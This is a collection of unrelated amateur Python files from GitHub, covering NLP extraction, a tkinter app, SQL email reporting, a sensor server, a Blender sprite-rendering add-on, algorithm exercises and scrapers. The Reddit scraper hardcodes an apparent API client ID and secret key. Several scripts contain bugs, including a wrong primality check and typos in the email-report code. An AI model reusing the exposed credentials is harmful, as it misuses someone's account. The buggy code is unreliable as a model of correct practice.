in parsetree:\n # print(\"triple in full_word is \",triple)\n if(triple[0][0] == word and (triple[1] in phrase_list)):\n full_word = full_word + \" \" + get_full_word(triple[2][0],parsetree)\n\n full_word = full_word + \" \" + word\n return full_word\n\ndef extract_np(psent):\n for subtree in psent.subtrees():\n if subtree.label() == 'NP':\n yield ' '.join(word for word, tag in subtree.leaves())\n\ndef get_parse_tree(sentence):\n\n dependency_parser = stan_dep_parser.raw_parse(sentence)\n doc = nlp(sentence)\n parsetree = []\n dep = dependency_parser.next()\n for triple in dep.triples():\n parsetree.append(triple)\n # print(triple)\n return parsetree\n\ndef passive(parsetree):\n doc = nlp(sentence)\n\n impact = \"\"\n impact_word = \"\"\n cause_subject = \"\"\n cause_object = \"\"\n\n for ent in doc:\n if ((ent.dep_ == \"pobj\" or ent.dep_ == \"dobj\") and ent.head.text == \"by\"):\n Predictor = get_noun_phrases(ent.text,sentence)\n \n should_restart = True\n restarted = False\n while should_restart == True:\n should_restart = False\n for triple in parsetree:\n\n if restarted == False and triple[0][1] in ['VBD'] and triple[1] in ['ccomp','rcmod','vmod','xcomp']:\n\n impact_word = triple[0][0]\n impact = get_noun_phrases(triple[0][0],sentence)\n should_restart = True\n restarted = True\n break\n\n elif triple[0][0] == impact_word and triple[1] == 'nsubj':\n cause_subject = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][1] == 'VBN' and triple[1] == 'nsubjpass':\n cause_object = get_noun_phrases(triple[2][0],sentence)\n\n print(\"predictors:\",predictors)\n print(\"Predictor:\", Predictor)\n print(\"Impact:\", impact)\n print(\"cause_subject:\",cause_subject)\n print(\"cause_object:\",cause_object)\n # print(\"Date:\", date)\n\n\ndef extract_filled_templates(sentence,stem):\n doc = nlp(sentence)\n # merge entities and noun chunks into one token\n spans = list(doc.ents) + list(doc.noun_chunks)\n for span in spans:\n span.merge()\n\n parsetree = get_parse_tree(sentence)\n\n \n\n Predictor = \"\"\n impact = \"\"\n impact_word = \"\"\n cause_subject = \"\"\n cause_object = \"\"\n \n\n for triple in parsetree:\n\n if triple[0][1] in ['VBD','VBN'] and triple[1] in ['nsubj','nsubjpass']:\n Predictor = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][1] in ['VBD'] and triple[1] in ['ccomp','rcmod','vmod','xcomp']:\n if(triple[2][1] == 'VBN'):\n return passive(parsetree)\n \n impact_word = triple[2][0]\n impact = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][0] == impact_word and triple[1] == 'nsubj':\n cause_subject = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][0] == impact_word and triple[1] == 'dobj':\n cause_object = get_noun_phrases(triple[2][0],sentence)\n\n\n \n print(\"Predictor:\", Predictor)\n print(\"Impact:\", impact)\n print(\"cause_subject:\",cause_subject)\n print(\"cause_object:\",cause_object)\n # print(\"Date:\", date)\n\ndef get_subject_object(word_index,lemmas):\n if (word_index + 1 < len(lemmas) - 1 and lemmas[word_index + 1] == 'by'):\n # passive voice\n passive = True\n sub_sentence = ' '.join(lemmas[word_index + 2:])\n obj_sentence = ' '.join(lemmas[:word_index])\n else:\n # active voice\n sub_sentence = ' '.join(lemmas[:word_index])\n obj_sentence = ' '.join(lemmas[word_index + 1:])\n\n return sub_sentence,obj_sentence\n\n\ndef extract_filled_templates2(sentence,stem):\n impact_word = \"\"\n cause_subject = \"\"\n cause_object = \"\"\n Predictor = \"\"\n imp_sub_sentence = \"\"\n impact_subjects = []\n cause_object_word = \"\"\n\n lmtzr = nltk.WordNetLemmatizer()\n word_tokens = word_tokenize(sentence)\n # lemmas = [lmtzr.lemmatize(token, 'v') for token in word_tokens]\n # lemma_set = set(lemmas)\n\n # for item in lemma_set:\n # print(\"stem is \",stem,\"item is \",item)\n # if stem in item:\n # matching_template = item\n\n matching_template = stem\n word_index = word_tokens.index(matching_template)\n # divide the sentence before the template verb and after the template verb by considering 'by' to be active or passive voice determiner\n \n sub_sentence,obj_sentence = get_subject_object(word_index,word_tokens)\n # print(sub_sentence)\n # print(obj_sentence)\n\n # include grammar for extracting head level noun phrases in the template\n grammar = r\"\"\"\n NP: {?*} # chunk determiner/possessive, adjectives and noun\n {+} # chunk sequences of proper nouns\n {+} # chunk consecutive nouns\n {+}\n {+}\n \"\"\"\n cp = nltk.RegexpParser(grammar) # Define Parser for extracting noun phrases\n\n sub_tagged_sent = nltk.pos_tag(sub_sentence.split())\n sub_tokens = word_tokenize(sub_sentence)\n sub_parsed_sent = cp.parse(sub_tagged_sent)\n predictors = set([get_noun_phrases(npstr,sentence) for npstr in extract_np(sub_parsed_sent)])\n # predictors = [get_noun_phrases(entry,sub_sentence) for entry in sub_tagged_sent]\n\n parsetree = get_parse_tree(sentence)\n for triple in parsetree:\n # if 'VB' in triple[0][1] and triple[1] in ['nsubj']:\n if stem in triple[0][0]:\n predictor_word = triple[2][0]\n # print(\"Predictor word is \",predictor_word)\n break\n # for entry in predictors:\n # if predictor_word in entry:\n # Predictor = entry\n Predictor = get_noun_phrases(predictor_word,sub_sentence)\n\n\n\n # \n \n\n parsetree_sub = get_parse_tree(obj_sentence)\n impact_word = \"\"\n for triple in parsetree_sub:\n # print(\"triple in sub sentence is \",triple)\n if 'VB' in triple[0][1] and triple[1] == 'nsubj':\n if(triple[0][0] in ['was','is']):\n continue\n impact_word = triple[0][0]\n # print(\"impact_word found is ************\",impact_word)\n word_tokens = word_tokenize(obj_sentence)\n # lemmas = [lmtzr.lemmatize(token, 'v') for token in word_tokens]\n word_index_imp = word_tokens.index(impact_word)\n imp_sub_sentence,imp_obj_sentence = get_subject_object(word_index_imp,word_tokens)\n \n if triple[0][0] == impact_word and triple[1] == 'nsubj':\n cause_subject = get_noun_phrases(triple[2][0],imp_sub_sentence)\n\n elif triple[0][0] == impact_word and triple[1] == 'dobj':\n cause_object = get_full_word(triple[2][0],parsetree_sub)\n break\n \n # elif impact_word != \"\" and triple[2][1] == 'NN':\n # cause_object = get_full_word(triple[2][0],parsetree_sub)\n # break\n \n # if cause_subject == \"\":\n # obj_tagged_sent = nltk.pos_tag(imp_sub_sentence.split())\n # obj_parsed_sent = cp.parse(obj_tagged_sent)\n # impact_subjects = set([get_noun_phrases(npstr,imp_sub_sentence) for npstr in extract_np(obj_parsed_sent)])\n \n\n\n \n\n if impact_word == \"\" or cause_object == \"\":\n doc_sub = nlp(obj_sentence)\n for triple in parsetree_sub:\n if triple[1] in ['pobj','dobj']:\n cause_object_word = triple[2][0]\n # print(\"cause_object word is **\",cause_object_word)\n break\n \n for entry in doc_sub.noun_chunks:\n if cause_object_word in entry.text:\n cause_object = get_full_word(entry.text,parsetree_sub)\n else:\n impact_subjects.append(entry.text)\n\n\n print(\"Predictor:\",predictors)\n # print(\"Predictor:\", Predictor)\n # print(\"impact_subjects\",impact_subjects)\n print(\"cause_subject:\",cause_subject)\n print(\"Impact:\", impact_word)\n print(\"cause_object:\",cause_object)\n\n\ndef main():\n sentence = unicode(sys.argv[1],'utf-8')\n # print(sentence)\n stem = unicode(sys.argv[2],'utf-8')\n # print(\"stem is \",stem)\n # stem = u\"predicted\"\n # sentence = u\"Everyone on Wall Street predicted the dollar's three-year bear market would get even worse this year.\"\n # sentence = u\"A chip-industry's prediction showed, revenue for semiconductor-manufacturing equipment would decline 19% this year to $22.8 billion.\"\n # sentence = u\"Elliott Platt predicted that business activity will expand at a lethargic 2% annual rate in 1987's first quarter.\"\n # sentence = u\"Yesterday's news that fourth quarter GDP rose a healthy 3.5% was predicted by media and Beltway bear in the past four years.\"\n # sentence = u\"A Dow Jones Newswires survey of 18 banks showed a median forecast for a dollar decline of about 9% against the euro and the yen by the end of next year.\"\n # sentence = u\"Berson also nailed his forecast for the change in the consumer-price index, which advanced 2.8% for the 12 months through May.\"\n # # extract_filled_templates(sentence,stem)\n # sentence = u\"Chief executives of nation's largest corporations anticipate slower growth for the economy next year.\"\n # sentence = u\"Wall Street generalists had anticipated an 85,000 drop.\"\n # sentence = u\"Federal Reserve Bank of Boston estimated the program could create one million jobs over two years.\"\n # sentence = u\"Lufkin & Jenrette Inc predicted the Fed will cut the discount rate to 5% by mid-February. \"\n extract_filled_templates2(sentence,stem)\n \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"arijeet-roy/Information-Extractor-NLP","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":11571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42214952192","text":"from tkinter import *\r\nimport random\r\n\r\nroot=Tk()\r\n\r\nroot.title(\"Picnic Bag List\")\r\nroot.geometry(\"300x200\")\r\nroot.configure(bg=\"#6dbbbf\")\r\n\r\nitems=[\"food\",\"phone\",\"Blanket\",\"Drinks\",\"Chocolates\"]\r\nprint(items)\r\n\r\noutput=Label(root,text=\"Items: Food, Phone, Blanket, Drinks, Chocolates\")\r\noutput.place(relx=0.5,rely=0.4,anchor=CENTER)\r\n\r\noutput=Label(root,bg=\"#6dbbbf\",fg=\"green\")\r\n\r\ndef thingy():\r\n bob=random.randint(0,4)\r\n chosen=items[bob]\r\n print(chosen)\r\n output[\"text\"]=\" You should put \" + chosen + \" in your bag\"\r\n \r\nbtn=Button(root,text=\"Which Item to put in the bag?\", command=thingy, bg=\"purple\", fg=\"yellow\")\r\nbtn.place(relx=0.5,rely=0.5,anchor=CENTER)\r\noutput.place(relx=0.5,rely=0.65,anchor=CENTER)\r\n\r\nroot.mainloop()","repo_name":"Pandaloo808/Picnic-bag","sub_path":"Picnic bag.py","file_name":"Picnic bag.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"824960617","text":"#imports for SQL data part \nimport pyodbc \nfrom datetime import datetime, timedelta\nimport pandas as pd \n\n#imports for sending email\nfrom email.mine.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nimport smtplib\n\ndate = datetime.today() - timedelta(days=7) #get the date 7 days ago\n\ndate = date.strftime(\"%Y-%m-%d\") # convert to format yyyy-mm-dd\n\ncnxn = pyodbc.connect(cnxn_str) #initialise connection (assume cnxn_str already defined)\n\n# build up our query string \nquery = (\"SELECT * FROM customers\"\n f\"WHERE joinDate > '{date}'\")\n\n#execute the query and read to a dataframe in python \ndata = pd.read_sql(query, cnxn)\n\ndel cnxn # close the connection \n\n#make a few calculations \nmean_payment = data['payment'].mean()\nstd_payment = data['payment'].std()\n\n# get max payment and product details \nmax_vals = data[['product', 'payment']].sort_values(by=['pament'], ascending=False.iloc[0])\n\n#write an email message using the email library and send using smtplib\ntxt = (f\"Customer reporting for period {date} - {datetime.today().strftime('%Y-%m-%d')}.\\n\\n\"\n f\"Mean payment amount received: {mean_payment}\\n\"\n f\"Standard deviation of payment amounts: {std_payments}\\n\"\n f\"Highest payment amount of {max_vals['payment']}\"\n f\"received from {max_vals['product']} product.\")\n\n#we build the message using the email librar and send using smtplib\nmsg = MIMEMultipart()\nmsg['Subject'] = \"Automated customer report\" #set email subject\nmsg.attach(MIMEText(txt)) #add text contents \n\n#we will send via outlook, first we initialise connection to main server\nsmtp = smtplib.SMTP('smtp-mail.outlook.com', '587')\nsmtp.ehlo() #say hello to the server \nsmto.starttls() #we will communicate using TLS encrytion\n\n#send email to our boss \nsmtp.sendmail('joebidden@mail.com', 'joebidden@mail.com', msg.as_string())\n\n#finalls disconnect from the mail server \nsmtp.quit()","repo_name":"ekck/SQL-server-with-python","sub_path":"automatedreporting.py","file_name":"automatedreporting.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69967018824","text":"#Exercício Adicional 1\n\n#Escreva um programa que receba um número inteiro positivo na entrada e verifique se é primo. Se o número for primo, imprima \"primo\". Caso contrário, imprima \"não primo\".\n\nn = int(input(\"Digite um n: \"))\np = n // 2\n\nwhile n > 0:\n\tif (n != 1) and (p % 2) != 0:\n\t\tprint(\"primo\")\n\t\tn -= n #FLAG. Indicador de passagem\n\telse: #if (n = 1) and (p % 2) == 0:\n\t\tprint(\"não é primo\")\n\t\tn -= n #FLAG. Indicador de passagem","repo_name":"deomorxsy/kata","sub_path":"languages/noob/python/USP_CDC-com-Python/semana 4/primalidade.py","file_name":"primalidade.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15221536560","text":"#!/usr/bin/env python\nimport os\nimport json\nfrom dotenv import load_dotenv\nimport cherrypy\nfrom cherrypy.lib.static import serve_file\nfrom SensorManager import SensorManager\nfrom subprocess import call\n\ncherrypy.config.update({'log.screen': False})\n\nclass Root(object):\n\n @cherrypy.expose\n def requestImage(self, *args, **kwargs):\n print('image request made')\n try:\n call([\"fswebcam\",\"-r\", \"1280x720\", \"--no-banner\", \"image.png\"])\n cherrypy.response.headers['Content-type'] = 'image/png'\n f = open('image.png', 'rb')\n return f.read()\n except Exception as e:\n print('Error creating image')\n print(e)\n\n # Check if sensor can be created\n @cherrypy.expose\n @cherrypy.tools.json_out()\n def sensorCheck(self, *args, **kwargs):\n print('checking sensor')\n i = 0\n\n while True:\n sensor = os.getenv('SENSOR_{}_HARDWARE_NAME'.format(i))\n if sensor is None:\n return 'unhealthy'\n break\n if sensor == kwargs['hardwareSensor']:\n break\n i = i + 1\n cherrypy.response.headers['Content-Type'] = \"application/json\"\n test = sensorManager.testSensor(i, kwargs['readingType'])\n return json.dumps(test)\n\n\n # Check if station exists\n @cherrypy.expose\n def health(self, *args, **kwargs):\n return 'healthy'\n\n # Check if sensor is currently running\n @cherrypy.expose\n def sensorHealth(self, *args, **kwargs):\n result = sensorManager.checkSensor(kwargs)\n if result == 'unhealthy':\n cherrypy.response.status = 500\n return result\n # Start a sensor\n @cherrypy.expose\n def startSensor(self, *args, **kwargs):\n sensorManager.startSensor()\n\n # Stop a sensor\n @cherrypy.expose\n def stopSensor(self, *args, **kwargs):\n sensorManager.stopSensor()\n\n # Get list of available sensors\n @cherrypy.expose\n @cherrypy.tools.json_out()\n def list(self, *args, **kwargs):\n i = 0\n sensors = []\n while True:\n sensor = os.getenv('SENSOR_{}_HARDWARE_NAME'.format(i))\n if sensor is None:\n break\n readingType = os.getenv('SENSOR_{}_READING_TYPE'.format(i))\n sensorType = os.getenv('SENSOR_{}_POLLER'.format(i))\n sensors.append({\"name\": sensor, 'readingType': readingType, 'sensorType': sensorType})\n i += 1\n\n\n cherrypy.response.headers['Content-Type'] = \"application/json\"\n return json.dumps(sensors)\n\n\ndef RunServer():\n cherrypy.tree.mount(Root(), '/')\n cherrypy.server.socket_host = \"0.0.0.0\"\n cherrypy.server.socket_port = int(os.getenv('PORT'))\n cherrypy.engine.start()\n cherrypy.engine.block()\n\n\nif __name__ == \"__main__\":\n print(\"starting server!\")\n load_dotenv()\n sensorManager = SensorManager()\n RunServer()\n","repo_name":"cyrillegin/dragonfly","sub_path":"satellite/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17868563897","text":"def help_me_mom(i, j, shark):\n\n global fish_Tank, arr, N, cnt\n\n visited = [[0]*N for l in range(N)]\n q=[]\n q.append([i, j])\n visited[i][j] = 1\n fish_Find = [] # 먹을 수 있는 물고기의 좌표\n while q:\n if not fish_Find:\n for s in range(len(q)):\n qo = q.pop(0)\n i = qo[0]\n j = qo[1]\n\n for k in range(4):\n ni = i + di[k]\n nj = j + dj[k]\n if ni >= 0 and nj >= 0 and ni < N and nj < N and visited[ni][nj] == 0 and fish_Tank[ni][nj] <= shark:\n if 0 < fish_Tank[ni][nj] < shark:\n arr[ni][nj] = arr[i][j] + 1\n visited[ni][nj] = 1\n fish_Find.append([ni, nj])\n else:\n arr[ni][nj] = arr[i][j] + 1\n visited[ni][nj] = 1\n q.append([ni, nj])\n else:\n break\n if fish_Find:\n fi = sorted(fish_Find).pop(0)\n fix = fi[0]\n fiy = fi[1]\n fish_Tank[fix][fiy] = 0\n time_Check.append(arr[fix][fiy])\n cnt += 1\n if cnt == shark:\n cnt = 0\n shark += 1\n help_me_mom(fix, fiy, shark)\n\n\ndi = [-1,0,0,1]\ndj = [0,-1,1,0]\n\nN = int(input())\nfish_Tank = [list(map(int, input().split())) for i in range(N)]\narr = [[0]*N for i in range(N)]\n\nshark = 2\ncnt = 0\ntime_Check = [0]\n\nI = -1\nfor i in range(N):\n for j in range(N):\n if fish_Tank[i][j] == 9:\n fish_Tank[i][j] = 0\n I, J = i, j\n help_me_mom(I, J, shark)\n break\n if I != -1:\n break\n\nprint(time_Check[-1])","repo_name":"cdh3261/Algorithm_Problems","sub_path":"BAEKJOON/탐색&시뮬/아기상어-주석X.py","file_name":"아기상어-주석X.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13297212780","text":"\n\nimport itertools \n\nglobal chars\nchars=[\"a\",\"c\",\"g\",\"t\"]\n\n\n\n######################################################################################\n#******function to compute max char in score matrix\ndef computeMax(l,start): \n max_ind=0\n max_char=chars[0]\n max_val=l[0]\n for u in range(start,len(chars)):\n if l[u]>max_val:\n max_val=l[u]\n max_char=chars[u]\n max_ind=u\n \n\n return max_val,max_char,max_ind\n\n##################################################################################################\n#******function takes a sequence of dna and computes its score matrix and return suggested motif \ndef scoreMat(dna_seq):\n \n #tanspose for easier computations\n dna_seq=[[dna_seq[j][i] for j in range(len(dna_seq))] for i in range(len(dna_seq[0]))]\n \n a_count=0\n c_count=0\n g_count=0\n t_count=0\n\n list=[]\n for i in dna_seq:\n for j in i:\n if j==\"a\":\n a_count+=1\n if j==\"c\":\n c_count+=1\n if j==\"g\":\n g_count+=1\n if j==\"t\":\n t_count+=1\n list.append(str(a_count)+str(c_count)+str(g_count)+str(t_count))\n a_count=0\n c_count=0\n g_count=0\n t_count=0\n count_matrix=[[list[j][i] for j in range(len(list))] for i in range(len(list[0]))]\n \n j=0\n sum_list=[]\n\n sg_motif=\"\"\n cons_score=0\n for m in range(k):\n for i in range(len(count_matrix)):\n sum_list.append(int(count_matrix[i][j])) \n same_val=[]\n max_val,max_char,max_index=computeMax(sum_list,0) \n for i in range(max_index+1,len(sum_list)):\n if sum_list[i]==max_val:\n st=sg_motif\n st+=chars[sum_list[i]]\n same_val.append(st) \n sg_motif+=max_char\n cons_score+=max_val\n sum_list=[]\n j+=1\n sg_motifs=[]\n #to handle motifs with same value in two or more chars ex: A&T both have same value in count matrix\n for j in range(len(same_val)):\n same_val[j]+=sg_motif[len(same_val[j]):]\n sg_motifs.append(same_val[j])\n cons_score=round((cons_score/(t*k))*100)\n sg_motifs.append(sg_motif)\n\n return count_matrix,sg_motifs,cons_score\n \n\n\n##################################################################################\n#*****takes a DNA, num of seqs in dna, length of dna seq, kmer length,and returns \n#***** list of its motifs, their score, and their starting posions\n\ndef motifSearch(dna,t,n,k):\n indexes=itertools.product(range(n-k), repeat=t)\n score_arr=[]\n motif_arr=[]\n startPos_arr=[]\n for i in indexes:\n v=0\n k_list=[]\n for j in i:\n p=dna[v][j:j+k]\n k_list.append(p)\n v+=1\n par_score=0\n sug_motifs=[]\n _,sug_motifs,par_score=scoreMat(k_list)\n #adding only unique motifs \n for j in sug_motifs:\n if j not in motif_arr: \n startPos_arr.append(i)\n score_arr.append(par_score)\n motif_arr.append(j)\n \n return score_arr,motif_arr,startPos_arr\n\n###################################################################################\n#**********MAIN*******************\n\nDNA=[\n \"ggctatccaggtactt\",\n \"gatccatacgtacacc\",\n \"aaacgttagtgcaccc\"]\n#lower bound to start our motifs selection\nlower_bound=60\n\n#length of the motif\nk=4\n\n#number of sequences in the DNA\nt=len(DNA)\n\n#length of each sequence in the DNA\nn=len(DNA[0])\n\n#arrays of all scores , motifs and starting postions\nscore_arr=[]\nmotif_arr=[]\ns_arr=[]\n\n\nscore_arr,motif_arr,s_arr= motifSearch(DNA,t,n,k)\nfinal_motifs=[]\nfinal_scores=[]\nfinal_s=[]\nfor i in range(len(score_arr)):\n if score_arr[i]>=lower_bound:\n final_scores.append(score_arr[i])\n final_motifs.append(motif_arr[i])\n final_s.append(s_arr[i])\nfor i in range(len(final_motifs)):\n print(\"motif : \",final_motifs[i], \" with score: \",final_scores[i],\"% \")\n print(\"starting positions : \",final_s[i])\n \n\n\n\n\n\n\n","repo_name":"sondos-ui/motif-finding-algorithm-python-implementation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4131559820","text":"def cont_dp(arr):\n\tsumm=[0]*len(arr)\n\tif arr[0]>0:\n\t\tsumm[0]=arr[0]\n\telse:\n\t\tsumm[0]=0\n\tfor i in range(1,len(arr)):\n\t\tif arr[i]+summ[i-1]>0:\n\t\t\tsumm[i]=arr[i]+summ[i-1]\n\t\telse:\n\t\t\tsumm[i]=0\n\tx=max(summ)\n\treturn x\narr=[1,2,3,-7,2,5,7,8,2,0,1,-4]\nprint(cont_dp(arr))","repo_name":"jayant77/DP_problems","sub_path":"contigous_sumDp.py","file_name":"contigous_sumDp.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27226490088","text":"#File path\nfileName = 'D:\\college\\AOC 2022\\Day1\\input.txt'\n\n#Reading from file\nfile = open(fileName,'r')\nread = file.readlines()\n\n#Going through the array and adding up all the calories and when we find a '\\n' character we see if the current sum is bigger than the best sum then we put current sum back on zero and start again until the end of the array.\nnewString = ''\nbestSum = 0\ncurrentSum = 0\nfor i in read:\n if i == '\\n':\n currentSum = 0\n else:\n newString = i.replace('\\n','')\n currentSum += int(newString) \n if currentSum > bestSum:\n bestSum = currentSum\n\nprint(bestSum)","repo_name":"Vaasco/AdventOfCode2022","sub_path":"Day1/Main_part1.py","file_name":"Main_part1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28790076798","text":"#!/usr/bin/python\nimport re\nfrom bs4 import BeautifulSoup\nimport requests\n\npage = requests.get('https://www.worldometers.info/coronavirus/')\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# print(soup)\n\nbat_soup = soup.find_all(\"div\", {\"id\": \"maincounter-wrap\"})\n\ntitles=[]\nfor block in bat_soup:\n titles.append(block.find(\"h1\").get_text())\n\ncounts=[]\nfor block in bat_soup:\n counts.append(block.find(\"span\").get_text())\n\ncases_count=re.sub('\\D','',counts[0])\ndeath_count=re.sub('\\D','',counts[1])\n\nprint(cases_count, death_count)\n","repo_name":"cjws/Corona","sub_path":"coronaCount.py","file_name":"coronaCount.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"14274134787","text":"bl_info = {\n \"name\": \"AGS Blender tools\",\n \"description\": \"Blender add-on to render sprites to use in Adventure Game Studio\",\n \"author\": \"SanderDL\",\n \"version\": (1, 0, 0),\n \"blender\": (2, 79, 0),\n \"location\": \"3D View > Tools\",\n \"warning\": \"The script currently has no checks for duplicate or missing objects.\",\n \"wiki_url\": \"https://github.com/Sanderdl/AGS_Tools\",\n \"tracker_url\": \"https://github.com/Sanderdl/AGS_Tools/issues\",\n \"category\": \"Development\"\n}\n\nimport bpy\nimport math\n\nfrom bpy.props import (StringProperty,\n BoolProperty,\n IntProperty,\n FloatProperty,\n EnumProperty,\n PointerProperty,\n )\nfrom bpy.types import (Panel,\n Operator,\n PropertyGroup,\n )\n\n\n# ------------------------------------------------------------------------\n# properties\n# ------------------------------------------------------------------------\n\nclass RenderSettings(PropertyGroup):\n\n sidesEnum = EnumProperty(\n name=\"Sides:\",\n description=\"Number of sides to render\",\n items=[ (\"4\", \"4 sides\", \"\"),\n (\"8\", \"8 sides\", \"\")\n ]\n )\n \n path = StringProperty(\n name=\"\",\n description=\"Folder to save sprites\",\n default=\"\",\n maxlen=1024,\n subtype='DIR_PATH')\n \n cameraTarget = StringProperty(\n name=\"\",\n description=\"Object the camera uses to rotate around the subject\",\n default=\"\",\n maxlen=200)\n\n# ------------------------------------------------------------------------\n# operators\n# ------------------------------------------------------------------------\n\nclass AgsRenderOperator(bpy.types.Operator):\n bl_idname = \"ags.render\"\n bl_label = \"Render sprites\"\n\n def execute(self, context):\n scene = context.scene\n mytool = scene.my_tool\n\n sides = int(mytool.sidesEnum)\n rotationAngle = 360.0 /sides\n rotDummy = scene.objects[mytool.cameraTarget]\n \n scene.render.alpha_mode = \"TRANSPARENT\"\n \n \n for i in range(1, sides + 1):\n \n scene.render.filepath = mytool.path + \"side\" + str(i) + \"_\"\n \n bpy.ops.render.render( write_still=True, animation=True )\n \n rotDummy.rotation_euler = (0,0,math.radians(rotationAngle * i))\n print(\"side:\", i)\n \n\n rotDummy.rotation_euler = (0,0,0)\n \n return {'FINISHED'}\n \nclass SetupSceneOperator(bpy.types.Operator):\n bl_idname = \"ags.setup\"\n bl_label = \"Setup Scene\"\n \n def execute(self, context):\n \n scene = context.scene\n mytool = scene.my_tool\n \n cam = bpy.data.cameras.new(\"Camera\") \n cam_object = bpy.data.objects.new(name=\"Camera\", object_data=cam)\n cam_object.location = (0, -10, 4.5)\n cam_object.rotation_mode = \"XYZ\" \n cam_object.rotation_euler = (math.radians(75), 0, 0)\n \n rotDummy = bpy.data.objects.new( \"RotationDummy\", None )\n rotDummy.empty_draw_type = 'CUBE'\n rotDummy.location = (0, 0, 1) \n \n light = bpy.data.lamps.new(name=\"sun\", type='SUN') \n light.shadow_method = \"RAY_SHADOW\"\n lamp_object = bpy.data.objects.new(name=\"sun\", object_data=light)\n lamp_object.location = (0, 0, 10)\n \n shadowMat = bpy.data.materials.new(\"ShadowMaterial\")\n shadowMat.use_transparency = True\n shadowMat.alpha = 0.4\n shadowMat.use_only_shadow = True\n \n bpy.ops.mesh.primitive_plane_add(radius=4)\n shadowPlane = scene.objects.active\n shadowPlane.name = \"ShadowPlane\"\n shadowPlane.data.materials.append(shadowMat)\n \n scene.objects.link(lamp_object)\n scene.objects.link(rotDummy)\n scene.objects.link(cam_object)\n \n cam_object.parent = rotDummy\n crc = cam_object.constraints.new(\"TRACK_TO\")\n crc.target = rotDummy\n crc.track_axis = \"TRACK_NEGATIVE_Z\"\n \n return {'FINISHED'} \n\n# ------------------------------------------------------------------------\n# menus\n# ------------------------------------------------------------------------\n\nclass BasicMenu(bpy.types.Menu):\n bl_idname = \"ags.setup.menu\"\n bl_label = \"Setup\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"ags.setup\", text=\"Setup Renderscene\")\n\n# ------------------------------------------------------------------------\n# Draw tools in panel\n# ------------------------------------------------------------------------\n\nclass AgsRenderPanel(Panel):\n bl_idname = \"AGS_render_panel\"\n bl_label = \"AGS rendering\"\n bl_space_type = \"VIEW_3D\" \n bl_region_type = \"TOOLS\" \n bl_category = \"Tools\"\n bl_context = \"objectmode\" \n\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n mytool = scene.my_tool\n\n layout.prop(mytool, \"sidesEnum\", text=\"Sides\")\n layout.prop(mytool, \"path\", text=\"Path\")\n layout.prop_search(mytool, \"cameraTarget\", scene, \"objects\", text=\"Target\")\n \n layout.operator(\"ags.render\", text=\"Render sprites\")\n \n \nclass AgsSetupPanel(Panel):\n bl_idname = \"AGS_setup_panel\"\n bl_label = \"AGS setup\"\n bl_space_type = \"VIEW_3D\" \n bl_region_type = \"TOOLS\" \n bl_category = \"Tools\"\n bl_context = \"objectmode\" \n\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n \n layout.menu(\"ags.setup.menu\", text=\"Setup menu\") \n\n# ------------------------------------------------------------------------\n# register and unregister\n# ------------------------------------------------------------------------\n\ndef register():\n bpy.utils.register_module(__name__)\n bpy.types.Scene.my_tool = PointerProperty(type=RenderSettings)\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n del bpy.types.Scene.my_tool\n\nif __name__ == \"__main__\":\n register()","repo_name":"Sanderdl/AGS_Tools","sub_path":"scripts/AGS_Tools.py","file_name":"AGS_Tools.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"44952721296","text":"import pandas \nimport requests\nimport argparse\nimport json\n\n#-o is the output file\n#-s is the subreddit\nparser = argparse.ArgumentParser()\nparser.add_argument('-o','--output_file',help='output file')\nparser.add_argument('-s','--subreddit',help='enter a subreddit')\nargs = parser.parse_args()\n\ndef main():\n headers = reddit_auth()\n \n scrape_by_subreddit_into_file(args.subreddit,args.output_file,headers)\n\ndef reddit_auth():\n #AUTHENTICATION\n headers = {}\n CLIENT_ID = 'Fm91DhLSEMsxGwMA2m4RIQ'\n SECRET_KEY = 'XwKUdo-LCl63yS0Pp1y9tW0svMfU4A'\n auth = requests.auth.HTTPBasicAuth(CLIENT_ID,SECRET_KEY)\n with open('../auth/.env.example','r') as f:\n pw = f.read()\n data = {\n 'grant_type': 'password',\n 'username': 'Comp598_hw6',\n 'password': pw\n }\n headers = {'User-Agent': 'MyAPI/0.0.1'}\n res = requests.post('https://www.reddit.com/api/v1/access_token',\n auth=auth, data=data, headers=headers)\n TOKEN = res.json()['access_token']\n headers = {**headers, **{'Authorization': f'bearer {TOKEN}'}}\n #AUTHENTICATION\n return headers\n\ndef scrape_by_subreddit_into_file(subreddit,output_file,headers):\n #titles_for_each_subreddit 